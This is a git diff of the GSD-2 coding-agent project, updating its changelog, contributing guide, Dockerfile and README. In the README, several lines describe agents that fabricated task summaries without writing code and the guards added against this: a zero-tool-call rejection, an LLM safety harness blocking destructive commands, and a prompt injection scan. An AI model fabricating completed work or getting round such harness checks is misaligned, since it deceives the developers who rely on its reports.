+- **M001**: auto-commit after complete-milestone +- **M001**: auto-commit after validate-milestone +- **M001/S06**: auto-commit after complete-slice +- **M001/S06**: auto-commit after plan-slice +- **M001/S06**: auto-commit after research-slice +- **M001/S05**: auto-commit after complete-slice +- **M001/S05**: auto-commit after plan-slice +- **M001/S05**: auto-commit after research-slice +- **M001/S04**: auto-commit after complete-slice +- **M001/S04**: auto-commit after research-slice +- **M001/S03**: auto-commit after complete-slice +- **M001/S03**: auto-commit after plan-slice +- **M001/S03**: auto-commit after research-slice +- **M001/S02**: auto-commit after complete-slice +- **M001/S02**: auto-commit after plan-slice +- **M001/S02**: auto-commit after research-slice +- **M001/S01**: auto-commit after complete-slice + +## [2.43.0] - 2026-03-23 + +### Added +- **forensics**: opt-in duplicate detection before issue creation (#2105) + +### Fixed +- prevent banner from printing twice on first run (#2251) +- **test**: Windows CI — use double quotes in git commit message (#2252) +- **async-jobs**: suppress duplicate follow-up for awaited job results (#2248) (#2250) +- **gsd**: remove force-staging of .gsd/milestones/ through symlinks (#2247) (#2249) +- **gsd**: remove over-broad skill activation heuristic (#2239) (#2244) +- **auth**: fall through to env/fallback when OAuth credential has no registered provider (#2097) +- **lsp**: bound message buffer and clean up stale client state (#2171) +- clean up macOS numbered .gsd collision variants (#2205) (#2210) +- **search**: keep duplicate-search loop guard armed (#2117) +- clean up extension error listener on session dispose (#2165) +- **web**: resolve 4 pre-existing onboarding contract test failures (#2209) +- async bash job timeout hangs indefinitely instead of erroring out (#2214) +- **gsd**: apply fast service tier outside auto-mode (#2126) +- **interactive**: clean up leaked SIGINT and extension selector listeners (#2172) +- **ci**: standardize GitHub Actions and Node.js versions (#2169) +- **native**: resolve memory leaks in glob, ttsr, and image overflow (#2170) +- extension resource management — prune stale dirs, fix isBuiltIn, gate skills on Skill tool, suppress search warnings (#2235) +- batch isolated fixes — error messages, preferences, web auth, MCP vars, detection, gitignore (#2232) +- document iTerm2 Ctrl+Alt+G keybinding conflict and add helpful hint (#2231) +- **footer**: display active inference model during execution (#1982) +- **web**: kill stale server process before launch to prevent EADDRINUSE (#1934) (#2034) +- **git**: force LC_ALL=C in GIT_NO_PROMPT_ENV to support non-English locales (#2035) +- **forensics**: force gh CLI for issue creation to prevent misrouting (#2067) (#2094) +- force-stage .gsd/milestones/ artifacts when .gsd is a symlink (#2104) (#2112) +- **pi-ai**: correct Copilot context window and output token limits (#2118) + +### Changed +- startup optimizations — pre-compiled extensions, compile cache, batch discovery (#2125) + +## [2.42.0] - 2026-03-22 + +### Added +- **gsd**: declarative workflow engine — YAML-defined workflows through the auto-loop (#2024) +- **gsd**: unified rule registry, event journal, journal query tool, and tool naming convention (#1928) +- **ci**: PR risk checker — classify changed files by system and surface risk level (#1930) +- ADR attribution — distinguish human vs agent vs collaborative decisions (#1830) +- add /gsd fast command and gate service tier icon to supported models (#1848) (#1862) +- add --host, --port, --allowed-origins flags for web mode (#1847) (#1873) + +### Fixed +- **tests**: wrap rmSync cleanup in try/catch for Windows EPERM +- **tests**: add maxRetries to rmSync cleanup for Windows EPERM compatibility +- recursive key sorting in tool-call loop guard hash function (#1962) +- use path.sep for cross-platform path traversal guards and test assertions +- **tests**: use cross-platform path split in run-manager timestamp test +- prevent SIGTSTP crash on Windows (#2018) +- add missing codeFilesChanged to journal integration test mock +- **repo-identity**: use native realpath on Windows to resolve 8.3 short paths (#1960) +- **doctor**: gate roadmap checkbox on summary existing on disk, not issue detection (#1915) +- warn when milestone merge contains only metadata and no code (#1906) (#1927) +- **worktree**: resolve 8.3 short paths and use shell mode for .bat hooks on Windows (#1956) +- **web**: persist auth token in sessionStorage to survive page refreshes (#1877) +- clean up SQUASH_MSG after squash-merge and guard worktree teardown against uncommitted changes (#1868) +- populate RecoveryContext in hook unit supervision to prevent crash on stalled tool recovery (#1867) +- resolve worktree path from git registry when .gsd/ symlink is shadowed (#1866) +- resolve Node v24 web boot failure — ERR_UNSUPPORTED_NODE_MODULES_TYPE_STRIPPING (#1864) +- **auto**: broaden worktree health check to all ecosystems (#1860) +- **doctor**: cascade slice uncheck when task_done_missing_summary unchecks tasks (#1850) (#1858) +- defend exit path against ESM module cache mismatch (#1854) +- escape parentheses in paths before bash shell-out, fix __extensionDir fallback (#1872) +- use PowerShell Start-Process for Windows browser launch, prevent URL wrapping (#1870) +- clear stale unit state and restore CWD when step-wizard exits auto-loop (#1869) +- prevent cross-project state leak in brand-new directories (#1639) (#1861) +- reconcile worktree HEAD with milestone branch ref before squash merge (#1846) (#1859) +- normalize Windows backslash paths in bash command strings (#1436) (#1863) +- parsePlan and verifyExpectedArtifact recognize heading-style task entries (#1691) (#1857) +- sync all milestone dirs regardless of naming convention (#1547) (#1845) + ## [2.41.0] - 2026-03-21 ### Added @@ -1598,7 +2601,36 @@ Format based on [Keep a Changelog](https://keepachangelog.com/en/1.1.0/). ### Changed - License updated to MIT -[Unreleased]: https://github.com/gsd-build/gsd-2/compare/v2.41.0...HEAD +[Unreleased]: https://github.com/gsd-build/gsd-2/compare/v2.67.0...HEAD +[2.67.0]: https://github.com/gsd-build/gsd-2/compare/v2.66.1...v2.67.0 +[2.66.1]: https://github.com/gsd-build/gsd-2/compare/v2.66.0...v2.66.1 +[2.66.0]: https://github.com/gsd-build/gsd-2/compare/v2.65.0...v2.66.0 +[2.65.0]: https://github.com/gsd-build/gsd-2/compare/v2.64.0...v2.65.0 +[2.64.0]: https://github.com/gsd-build/gsd-2/compare/v2.63.0...v2.64.0 +[2.63.0]: https://github.com/gsd-build/gsd-2/compare/v2.62.1...v2.63.0 +[2.62.1]: https://github.com/gsd-build/gsd-2/compare/v2.62.0...v2.62.1 +[2.62.0]: https://github.com/gsd-build/gsd-2/compare/v2.61.0...v2.62.0 +[2.61.0]: https://github.com/gsd-build/gsd-2/compare/v2.60.0...v2.61.0 +[2.60.0]: https://github.com/gsd-build/gsd-2/compare/v2.59.0...v2.60.0 +[2.59.0]: https://github.com/gsd-build/gsd-2/compare/v2.58.0...v2.59.0 +[2.58.0]: https://github.com/gsd-build/gsd-2/compare/v2.57.0...v2.58.0 +[2.57.0]: https://github.com/gsd-build/gsd-2/compare/v2.56.0...v2.57.0 +[2.56.0]: https://github.com/gsd-build/gsd-2/compare/v2.55.0...v2.56.0 +[2.55.0]: https://github.com/gsd-build/gsd-2/compare/v2.54.0...v2.55.0 +[2.54.0]: https://github.com/gsd-build/gsd-2/compare/v2.53.0...v2.54.0 +[2.53.0]: https://github.com/gsd-build/gsd-2/compare/v2.52.0...v2.53.0 +[2.52.0]: https://github.com/gsd-build/gsd-2/compare/v2.51.0...v2.52.0 +[2.51.0]: https://github.com/gsd-build/gsd-2/compare/v2.50.0...v2.51.0 +[2.50.0]: https://github.com/gsd-build/gsd-2/compare/v2.49.0...v2.50.0 +[2.49.0]: https://github.com/gsd-build/gsd-2/compare/v2.48.0...v2.49.0 +[2.48.0]: https://github.com/gsd-build/gsd-2/compare/v2.47.0...v2.48.0 +[2.47.0]: https://github.com/gsd-build/gsd-2/compare/v2.46.1...v2.47.0 +[2.46.1]: https://github.com/gsd-build/gsd-2/compare/v2.46.0...v2.46.1 +[2.46.0]: https://github.com/gsd-build/gsd-2/compare/v2.45.0...v2.46.0 +[2.45.0]: https://github.com/gsd-build/gsd-2/compare/v2.44.0...v2.45.0 +[2.44.0]: https://github.com/gsd-build/gsd-2/compare/v2.43.0...v2.44.0 +[2.43.0]: https://github.com/gsd-build/gsd-2/compare/v2.42.0...v2.43.0 +[2.42.0]: https://github.com/gsd-build/gsd-2/compare/v2.41.0...v2.42.0 [2.41.0]: https://github.com/gsd-build/gsd-2/compare/v2.40.0...v2.41.0 [2.40.0]: https://github.com/gsd-build/gsd-2/compare/v2.39.0...v2.40.0 [2.39.0]: https://github.com/gsd-build/gsd-2/compare/v2.38.0...v2.39.0 diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index acf637fc2..335cf7842 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -11,6 +11,59 @@ Read [VISION.md](VISION.md) before contributing. It defines what GSD-2 is, what 3. **No issue? Create one first** for new features. Bug fixes for obvious problems can skip this step. 4. **Architectural changes require an RFC.** If your change touches core systems (auto-mode, agent-core, orchestration), open an issue describing your approach and get approval before writing code. We use Architecture Decision Records (ADRs) for significant decisions. +## Branching and commits + +Always work on a dedicated branch. Never push directly to `main`. + +**Branch naming:** `/` + +| Type | When to use | +|------|-------------| +| `feat/` | New functionality | +| `fix/` | Bug or defect correction | +| `refactor/` | Code restructuring, no behavior change | +| `test/` | Adding or updating tests | +| `docs/` | Documentation only | +| `chore/` | Dependencies, tooling, housekeeping | +| `ci/` | CI/CD configuration | + +**Commit messages** must follow [Conventional Commits](https://www.conventionalcommits.org/). The commit-msg hook enforces this locally; CI enforces it on push. + +``` +(): +``` + +Valid types: `feat` `fix` `docs` `chore` `refactor` `test` `infra` `ci` `perf` `build` `revert` + +``` +feat(pi-agent-core): add streaming output for long-running tasks +fix(pi-ai): resolve null pointer on empty provider response +chore(deps): bump typescript from 5.3.0 to 5.4.2 +``` + +Keep branches current by rebasing onto `main` — do not merge `main` into your feature branch: + +```bash +git fetch origin +git rebase origin/main +``` + +## Working with GSD (team workflow) + +GSD uses worktree-based isolation for multi-developer work. If you're contributing with GSD running, enable team mode in your project preferences: + +```yaml +# .gsd/PREFERENCES.md +--- +version: 1 +mode: team +--- +``` + +This enables unique milestone IDs, branch pushing, and pre-merge checks — preventing milestone ID collisions when multiple contributors run auto-mode simultaneously. Each developer gets their own isolated worktree; squash merges to `main` happen independently. + +For full details see [docs/working-in-teams.md](docs/working-in-teams.md) and [docs/git-strategy.md](docs/git-strategy.md). + ## Opening a pull request ### PR description format @@ -65,10 +118,12 @@ If your PR changes any public API, CLI behavior, config format, or file structur AI-generated PRs are first-class citizens here. We welcome them. We just ask for transparency: -- **Disclose it.** Note that the PR is AI-assisted in your description. +- **Disclose it.** Note that the PR is AI-assisted in your description. Do not credit the AI tool as an author or co-author in the commit or PR. - **Test it.** AI-generated code must be tested to the same standard as human-written code. "The AI said it works" is not a test plan. - **Understand it.** You should be able to explain what the code does and why. If a reviewer asks a question, "I'll ask the AI" is not an answer. +AI agents opening PRs must follow the same workflow as human contributors: clean working tree, new branch per task, CI passing before requesting review. Multi-phase work should start as a Draft PR and only move to Ready when complete. + AI PRs go through the same review process as any other PR. No special treatment in either direction. ## Architecture guidelines @@ -91,9 +146,14 @@ The codebase is organized into these areas. All are open to contributions: | AI/LLM layer | `packages/pi-ai` | Provider integrations, model handling | | Agent core | `packages/pi-agent-core` | Agent orchestration — RFC required for changes | | Coding agent | `packages/pi-coding-agent` | The main coding agent | +| MCP server | `packages/mcp-server` | Project state tools and MCP protocol | | GSD extension | `src/resources/extensions/gsd/` | GSD workflow — RFC required for auto-mode | -| Native bindings | `native/` | Platform-specific native code | +| Other extensions | `src/resources/extensions/` | Browser, search, voice, MCP client, etc. | +| Native engine | `native/` | Rust N-API modules (grep, git, AST, etc.) | +| VS Code extension | `vscode-extension/` | Chat participant, sidebar, RPC integration | +| Web interface | `web/` | Browser-based dashboard | | CI/Build | `.github/`, `scripts/` | Workflows, build scripts | +| Documentation | `docs/` | User guides, ADRs, SDK docs | ## Review process @@ -103,12 +163,113 @@ PRs go through automated review first, then human review. To help us review effi - Respond to review comments. If you disagree, explain why — discussion is welcome. - If your PR has been open for a while without review, ping in Discord. We're a small team and things slip. +### What reviewers verify + +Reading a diff is not the same as verifying a change. Our review standard is execution-based, not static-analysis-based. + +**What reviewers do:** + +1. **Check out the branch** — check out the PR branch locally (or in a worktree). Don't review from the diff view alone. +2. **Build the branch** — run `npm run build`. A diff that doesn't compile is not reviewable. +3. **Run the test suite** — run `npm test`. CI status is a signal, not a substitute for local verification. +4. **Trace root cause for bug fixes** — confirm the diff addresses the root cause described in the issue, not just the symptom. +5. **Check for a regression test** — bug fixes must include a test that would have caught the original bug. If it's absent, the fix is incomplete. + +Only after completing these steps should a reviewer make claims about correctness. + +**What "looks right" means:** + +"Looks right" is the starting point for review, not the conclusion. "The tests pass" only means the tests pass — not that the claimed bug is fixed or the feature works as described. A well-written commit message on a broken change is still a broken change. + +### What contributors must provide to unblock review + +- **Bug fixes** — include a regression test. A fix without a test is an assertion, not a proof. +- **Features** — include tests covering the primary success path and at least one failure path. +- **Behavior changes** — update or replace any existing tests that cover the changed behavior. Don't leave passing-but-wrong tests in place. + +If your PR claims to fix issue #N, reviewers will verify the fix addresses the root cause described in #N — not just that CI is green. + +## Testing standards + +This project uses Node.js built-in `node:test` as the test runner. All new tests must follow these patterns: + +### Use `node:test` and `node:assert/strict` + +```typescript +import { describe, test, beforeEach, afterEach } from "node:test"; +import assert from "node:assert/strict"; +``` + +Do not use `createTestContext()` from `test-helpers.ts` (legacy, being removed). Do not introduce Jest, Vitest, or other test frameworks. + +### Use `beforeEach`/`afterEach` or `t.after()` for cleanup — never `try`/`finally` + +```typescript +// ✅ CORRECT — shared fixture with beforeEach/afterEach +describe("feature", () => { + let tmp: string; + beforeEach(() => { tmp = mkdtempSync(join(tmpdir(), "test-")); }); + afterEach(() => { rmSync(tmp, { recursive: true, force: true }); }); + + test("case", () => { /* clean test body */ }); +}); + +// ✅ CORRECT — per-test cleanup with t.after() +test("case", (t) => { + const tmp = mkdtempSync(join(tmpdir(), "test-")); + t.after(() => { rmSync(tmp, { recursive: true, force: true }); }); + // test body +}); + +// ❌ WRONG — inline try/finally +test("case", () => { + const tmp = mkdtempSync(join(tmpdir(), "test-")); + try { + // test body + } finally { + rmSync(tmp, { recursive: true, force: true }); + } +}); +``` + +**When to use which:** +- `beforeEach`/`afterEach` — when all tests in a `describe` block share the same setup/teardown pattern +- `t.after()` — when each test has unique cleanup (different fixtures, env vars, etc.) +- `try`/`finally` — only inside standalone helper functions that don't have access to the test context `t` (e.g., `withEnv()`, `capture()`) + +### Template literal fixture data + +When constructing multi-line fixture content (markdown, YAML, etc.) inside indented test blocks, use array join to avoid unintended leading whitespace: + +```typescript +// ✅ CORRECT — no indentation leakage +const content = [ + "## Slices", + "- [x] **S01: First slice**", + "- [ ] **S02: Second slice**", +].join("\n"); + +// ❌ WRONG — template literal inside describe/test adds leading spaces +const content = ` + ## Slices + - [x] **S01: First slice** +`; +// Each line now has 2 leading spaces, breaking ^## regex anchors +``` + +### Test-first for bug fixes + +Bug fixes must include a regression test that fails before the fix and passes after. Write the test first, confirm it fails, then apply the fix. See the `test-first-bugfix` skill. + ## Local development ```bash # Install dependencies npm ci +# Install git hooks (secret scanning + commit message validation) +npm run secret-scan:install-hook + # Build npm run build @@ -119,6 +280,10 @@ npm test npx tsc --noEmit ``` +Run `npm run secret-scan:install-hook` once after cloning. It installs two hooks: +- **pre-commit** — blocks commits containing hardcoded secrets or credentials +- **commit-msg** — validates Conventional Commits format before the commit lands + CI must pass before your PR will be reviewed. Run these locally to save time. ## Security diff --git a/Dockerfile b/Dockerfile index 45a18d128..b69e4bc6c 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,26 +1,5 @@ # ────────────────────────────────────────────── -# Stage 1: CI Builder -# Image: ghcr.io/gsd-build/gsd-ci-builder -# Used by: pipeline.yml Dev stage -# ────────────────────────────────────────────── -FROM node:24-bookworm AS builder - -# Rust toolchain (stable, minimal profile) -RUN curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y --default-toolchain stable --profile minimal -ENV PATH="/root/.cargo/bin:${PATH}" - -# Cross-compilation for linux-arm64 -RUN apt-get update && apt-get install -y --no-install-recommends \ - gcc-aarch64-linux-gnu \ - g++-aarch64-linux-gnu \ - && rustup target add aarch64-unknown-linux-gnu \ - && rm -rf /var/lib/apt/lists/* - -# Verify toolchain -RUN node --version && rustc --version && cargo --version - -# ────────────────────────────────────────────── -# Stage 2: Runtime +# Runtime # Image: ghcr.io/gsd-build/gsd-pi # Used by: end users via docker run # ────────────────────────────────────────────── diff --git a/README.md b/README.md index 99fd5a4fc..34ee30c1a 100644 --- a/README.md +++ b/README.md @@ -7,8 +7,9 @@ [![npm version](https://img.shields.io/npm/v/gsd-pi?style=for-the-badge&logo=npm&logoColor=white&color=CB3837)](https://www.npmjs.com/package/gsd-pi) [![npm downloads](https://img.shields.io/npm/dm/gsd-pi?style=for-the-badge&logo=npm&logoColor=white&color=CB3837)](https://www.npmjs.com/package/gsd-pi) [![GitHub stars](https://img.shields.io/github/stars/gsd-build/GSD-2?style=for-the-badge&logo=github&color=181717)](https://github.com/gsd-build/GSD-2) -[![Discord](https://img.shields.io/badge/Discord-Join%20us-5865F2?style=for-the-badge&logo=discord&logoColor=white)](https://discord.gg/gsd) +[![Discord](https://img.shields.io/badge/Discord-Join%20us-5865F2?style=for-the-badge&logo=discord&logoColor=white)](https://discord.com/invite/nKXTsAcmbT) [![License](https://img.shields.io/badge/license-MIT-blue?style=for-the-badge)](LICENSE) +[![$GSD Token](https://img.shields.io/badge/$GSD-Dexscreener-1C1C1C?style=for-the-badge&logo=data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjQiIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgZmlsbD0ibm9uZSIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48Y2lyY2xlIGN4PSIxMiIgY3k9IjEyIiByPSIxMCIgZmlsbD0iIzAwRkYwMCIvPjwvc3ZnPg==&logoColor=00FF00)](https://dexscreener.com/solana/dwudwjvan7bzkw9zwlbyv6kspdlvhwzrqy6ebk8xzxkv) The original GSD went viral as a prompt framework for Claude Code. It worked, but it was fighting the tool — injecting prompts through slash commands, hoping the LLM would follow instructions, with no actual control over context windows, sessions, or execution. @@ -18,81 +19,77 @@ One command. Walk away. Come back to a built project with clean git history.
npm install -g gsd-pi@latest
+> GSD now provisions a managed [RTK](https://github.com/rtk-ai/rtk) binary on supported macOS, Linux, and Windows installs to compress shell-command output in `bash`, `async_bash`, `bg_shell`, and verification flows. GSD forces `RTK_TELEMETRY_DISABLED=1` for all managed invocations. Set `GSD_RTK_DISABLED=1` to disable the integration. + > **📋 NOTICE: New to Node on Mac?** If you installed Node.js via Homebrew, you may be running a development release instead of LTS. **[Read this guide](./docs/node-lts-macos.md)** to pin Node 24 LTS and avoid compatibility issues. --- -## What's New in v2.41.0 +## What's New in v2.67 -### New Features +### Context Engineering -- **Browser-based web interface** — run GSD from the browser with `gsd --web`. Full project management, real-time progress, and multi-project support via server-sent events. (#1717) -- **Doctor: worktree lifecycle checks** — `/gsd doctor` now validates worktree health, detects orphaned worktrees, consolidates cleanup, and enhances `/worktree list` with lifecycle status. (#1814) -- **CI: docs-only PR detection** — PRs that only change documentation skip build and test steps, with a new prompt injection scan for security. (#1699) -- **Custom Models guide** — new documentation for adding custom providers (Ollama, vLLM, LM Studio, proxies) via `models.json`. (#1670) +- **Tiered Context Injection (M005)** — relevance-scoped context with 65%+ token reduction. Decision scope cascade derives context from slice metadata instead of blanket injection. +- **Resilient transient error recovery** — defers to Core RetryHandler and fixes cmdCtx race conditions for more reliable auto-mode sessions. -### Data Loss Prevention (Critical Fixes) +### Provider & Model Improvements -This release includes 7 fixes preventing silent data loss in auto-mode: +- **Anthropic subscription routing** — users with Anthropic subscriptions are automatically routed through Claude Code CLI provider with proper display names across all UI surfaces. +- **Claude Code provider hardening** — native Windows claude lookup, fallback guards, and `out of extra usage` error matching. +- **XML parameter recovery** — pi-ai recovers XML parameters trapped in JSON strings from providers. -- **Hallucination guard** — execute-task agents that complete with zero tool calls are now rejected as hallucinated. Previously, agents could produce detailed but fabricated summaries without writing any code, wasting ~$25/milestone. (#1838) -- **Merge anchor verification** — before deleting a milestone worktree/branch, GSD now verifies the code is actually on the integration branch. Prevents orphaning commits when squash-merge produces an empty diff. (#1829) -- **Dirty working tree detection** — `nativeMergeSquash` now distinguishes dirty-tree rejections from content conflicts, preventing silent commit loss when synced `.gsd/` files block the merge. (#1752) -- **Doctor cleanup safety** — the `orphaned_completed_units` check no longer auto-fixes during post-task health checks. Previously, timing races could cause the doctor to remove valid completion keys, reverting users to earlier tasks. (#1825) -- **Root file reverse-sync** — worktree teardown now syncs root-level `.gsd/` files (PROJECT.md, REQUIREMENTS.md, completed-units.json) back to the project root. Previously these were lost on milestone closeout. (#1831) -- **Empty merge guard** — milestone branches with unanchored code changes are preserved instead of deleted when squash-merge produces nothing to commit. (#1755) -- **Crash-safe task closeout** — orphaned checkboxes in PLAN.md are unchecked on retry, preventing phantom task completion. (#1759) +### Safety & Data Integrity -### Auto-Mode Stability +- **LLM safety harness** — auto-mode damage control prevents the LLM from running destructive operations or querying `gsd.db` directly via bash. +- **5-wave state machine hardening** — critical data integrity fixes across atomic writes, randomized tmp paths, event log reconciliation, session recovery, and consistency enforcement. 86+ regression tests added. +- **Discussion gate enforcement** — mechanical enforcement for discussion question gates with fail-closed behavior. +- **Enhanced verification** — pre-execution plan verification checks, post-execution cross-task consistency checks, blocking behavior and strict mode. -- **Terminal hang fix** — `stopAuto()` now resolves pending promises, preventing the terminal from freezing permanently after stopping auto-mode. (#1818) -- **Signal handler coverage** — SIGHUP and SIGINT now clean up lock files, not just SIGTERM. Prevents stranded locks on VS-Code crash. (#1821) -- **Needs-discussion routing** — milestones in `needs-discussion` phase now route to the smart entry UI instead of hard-stopping, breaking the infinite loop. (#1820) -- **Infrastructure error handling** — auto-mode stops immediately on ENOSPC, ENOMEM, and similar unrecoverable errors instead of retrying. (#1780) -- **Dependency-aware dispatch** — slice dispatch now uses declared `depends_on` instead of positional ordering. (#1770) -- **Queue mode depth verification** — the write gate now processes depth verification in queue mode, fixing a deadlock where CONTEXT.md writes were permanently blocked. (#1823) +### Parallel Execution & Dispatch -### Roadmap Parser Improvements +- **Slice-level parallelism** — dependency-aware parallel dispatch within a milestone, not just across milestones. +- **Parallel research slices** — research and milestone validation run in parallel. +- **Worker model override** — configure different models for parallel milestone workers. -- **Table format support** — roadmaps using markdown tables (`| S01 | Title | Risk | Status |`) are now parsed correctly. (#1741) -- **Prose header fallback** — when `## Slices` contains H3 headers instead of checkboxes, the prose parser is invoked as a fallback. (#1744) -- **Completion marker detection** — prose headers with `✓` or `(Complete)` markers are correctly identified as done. (#1816) -- **Zero-slice stub handling** — stub roadmaps from `/gsd queue` return `pre-planning` instead of `blocked`. (#1826) -- **Immediate roadmap fix** — roadmap checkbox and UAT stub are fixed immediately after last task instead of deferring to `complete-slice`. (#1819) +### TUI & Notifications -### State & Git Improvements +- **Persistent notification panel** — TUI overlay, widget, and web API for real-time notifications. +- **Remote questions race** — local TUI races against remote channel (Slack/Discord) instead of remote-only routing. +- **OS-specific keyboard shortcuts** — shortcut hints now adapt to macOS/Linux/Windows. +- **`/gsd show-config`** — inspect active configuration at a glance. -- **CONTEXT-DRAFT.md fallback** — `depends_on` is read from CONTEXT-DRAFT.md when CONTEXT.md doesn't exist, preventing draft milestones from being promoted past dependency constraints. (#1743) -- **Unborn branch support** — `nativeBranchExists` handles repos with zero commits, preventing dispatch deadlock on new repos. (#1815) -- **Ghost milestone detection** — empty `.gsd/milestones/` directories are skipped instead of crashing `deriveState()`. (#1817) -- **Default branch detection** — milestone merge detects `master` vs `main` instead of hardcoding. (#1669) -- **Milestone title extraction** — titles are pulled from CONTEXT.md headings when no ROADMAP exists. (#1729) +### Infrastructure -### Windows & Platform +- **Ollama native provider** — `/api/chat` provider with full option exposure, `apiKey` auth mode, and headless probe. +- **MCP OAuth** — MCP client supports OAuth auth provider for HTTP transport. +- **WAL-safe migration backup** — database migrations create WAL-safe backups with stronger regression tests. +- **Xcode/xcodegen detection** — project detection now supports Xcode bundles and xcodegen. +- **170+ bug fixes** — state machine resilience, worktree safety, prompt injection, session recovery, and more. -- **Windows path handling** — 8.3 short paths, `pathToFileURL` for ESM imports, and `realpathSync.native` fixes across the test suite and verification gate. (#1804) -- **DEP0190 fix** — `spawnSync` deprecation warning eliminated by passing commands to shell explicitly. (#1827) -- **Web build skip on Windows** — Next.js webpack EPERM errors on system directories are handled gracefully. +See the full [Changelog](./CHANGELOG.md) for details on every release. -### Developer Experience +
+Previous highlights (v2.63 and earlier) -- **@ file finder fix** — typing `@` no longer freezes the TUI. The fix adds debounce, dedup, and empty-query short-circuit. (#1832) -- **Tool-call loop guard** — detects and breaks infinite tool-call loops within a single unit, preventing stack overflow. (#1801) -- **Completion deferral fix** — roadmap checkbox and UAT stub are fixed at task level, closing the fragile handoff window between last task and `complete-slice`. (#1819) +- **MCP server** — 6 read-only project state tools for external integrations, auto-wrapup guard, and question dedup +- **Ollama extension** — first-class local LLM support via Ollama, with dynamic routing enabled by default +- **Discord bot & daemon** — dedicated daemon package, Discord bot, and headless text mode with tool calls +- **Capability-aware model routing (ADR-004)** — capability scoring, `before_model_select` hook, and task metadata extraction +- **VS Code sidebar redesign** — SCM provider, checkpoints, diagnostics panel, activity feed, workflow controls, session forking +- **`/gsd parallel watch`** — native TUI overlay for real-time worker monitoring +- **Codebase map** — automatic codebase map injection for fresh agent contexts +- **`--resume` flag** — resume previous sessions from the CLI +- **Concurrent invocation guard** — prevents overlapping auto-mode runs +- **VS Code integration** — status bar, file decorations, bash terminal, session tree, conversation history, and code lens +- **Skills overhaul** — 30+ skill packs covering major frameworks, databases, and cloud platforms +- **Single-writer state engine** — disciplined state transitions with machine guards and TOCTOU hardening +- **DB-backed planning tools** — atomic SQLite tool calls for state transitions +- **Declarative workflow engine** — YAML workflows through auto-loop +- **Doctor: worktree lifecycle checks** — validates worktree health, detects orphans, consolidates cleanup -See the full [Changelog](./CHANGELOG.md) for all 70+ fixes in this release. - -### Previous highlights (v2.39–v2.40) - -- **GitHub sync extension** — auto-sync milestones to GitHub Issues, PRs, and Milestones -- **Skill tool resolution** — skills auto-activate in dispatched prompts -- **Health check phase 2** — real-time doctor issues in dashboard and visualizer -- **Forensics upgrade** — full-access GSD debugger with anomaly detection -- **Pipeline decomposition** — auto-loop rewritten as linear phase pipeline -- **Sliding-window stuck detection** — pattern-aware, fewer false positives -- **Data-loss recovery** — automatic detection and recovery from v2.30–v2.38 migration issues +
--- @@ -118,7 +115,9 @@ Full documentation is available in the [`docs/`](./docs/) directory: - **[Visualizer](./docs/visualizer.md)** — workflow visualizer with stats and discussion status - **[Remote Questions](./docs/remote-questions.md)** — route decisions to Slack or Discord when human input is needed - **[Dynamic Model Routing](./docs/dynamic-model-routing.md)** — complexity-based model selection and budget pressure +- **[Web Interface](./docs/web-interface.md)** — browser-based project management and real-time progress - **[Pipeline Simplification (ADR-003)](./docs/ADR-003-pipeline-simplification.md)** — merged research into planning, mechanical completion +- **[Docker Sandbox](./docker/README.md)** — run GSD auto mode in an isolated Docker container - **[Migration from v1](./docs/migration.md)** — `.planning` → `.gsd` migration --- @@ -218,7 +217,7 @@ Auto mode is a state machine driven by files on disk. It reads `.gsd/STATE.md`, 2. **Context pre-loading** — The dispatch prompt includes inlined task plans, slice plans, prior task summaries, dependency summaries, roadmap excerpts, and decisions register. The LLM starts with everything it needs instead of spending tool calls reading files. -3. **Git worktree isolation** — Each milestone runs in its own git worktree with a `milestone/` branch. All slice work commits sequentially — no branch switching, no merge conflicts. When the milestone completes, it's squash-merged to main as one clean commit. +3. **Git isolation** — When `git.isolation` is set to `worktree` or `branch`, each milestone runs on its own `milestone/` branch (in a worktree or in-place). All slice work commits sequentially — no branch switching, no merge conflicts. When the milestone completes, it's squash-merged to main as one clean commit. The default is `none` (work on the current branch), configurable via preferences. 4. **Crash recovery** — A lock file tracks the current unit. If the session dies, the next `/gsd auto` reads the surviving session file, synthesizes a recovery briefing from every tool call that made it to disk, and resumes with full context. Parallel orchestrator state is persisted to disk with PID liveness detection, so multi-worker sessions survive crashes too. In headless mode, crashes trigger automatic restart with exponential backoff (default 3 attempts). @@ -354,6 +353,8 @@ On first run, GSD launches a branded setup wizard that walks you through LLM pro | `/gsd stop` | Stop auto mode gracefully | | `/gsd steer` | Hard-steer plan documents during execution | | `/gsd discuss` | Discuss architecture and decisions (works alongside auto mode) | +| `/gsd rethink` | Conversational project reorganization | +| `/gsd mcp` | MCP server status and connectivity | | `/gsd status` | Progress dashboard | | `/gsd queue` | Queue future milestones (safe during auto mode) | | `/gsd prefs` | Model selection, timeouts, budget ceiling | @@ -460,7 +461,7 @@ An auto-generated `index.html` shows all reports with progression metrics across ### Preferences -GSD preferences live in `~/.gsd/preferences.md` (global) or `.gsd/preferences.md` (project). Manage with `/gsd prefs`. +GSD preferences live in `~/.gsd/PREFERENCES.md` (global) or `.gsd/PREFERENCES.md` (project). Manage with `/gsd prefs`. ```yaml --- @@ -501,7 +502,7 @@ auto_report: true | `skill_rules` | Situational rules for skill routing | | `skill_staleness_days` | Skills unused for N days get deprioritized (default: 60, 0 = disabled) | | `unique_milestone_ids` | Uses unique milestone names to avoid clashes when working in teams of people | -| `git.isolation` | `worktree` (default), `branch`, or `none` — disable worktree isolation for projects that don't need it | +| `git.isolation` | `none` (default), `worktree`, or `branch` — enable worktree or branch isolation for milestone work | | `git.manage_gitignore` | Set `false` to prevent GSD from modifying `.gitignore` | | `verification_commands`| Array of shell commands to run after task execution (e.g., `["npm run lint", "npm run test"]`) | | `verification_auto_fix`| Auto-retry on verification failures (default: true) | @@ -542,7 +543,7 @@ See the full [Token Optimization Guide](./docs/token-optimization.md) for detail ### Bundled Tools -GSD ships with 19 extensions, all loaded automatically: +GSD ships with 24 extensions, all loaded automatically: | Extension | What it provides | | ---------------------- | ---------------------------------------------------------------------------------------------------------------------- | @@ -564,7 +565,12 @@ GSD ships with 19 extensions, all loaded automatically: | **Remote Questions** | Route decisions to Slack/Discord when human input is needed in headless/CI mode | | **Universal Config** | Discover and import MCP servers and rules from other AI 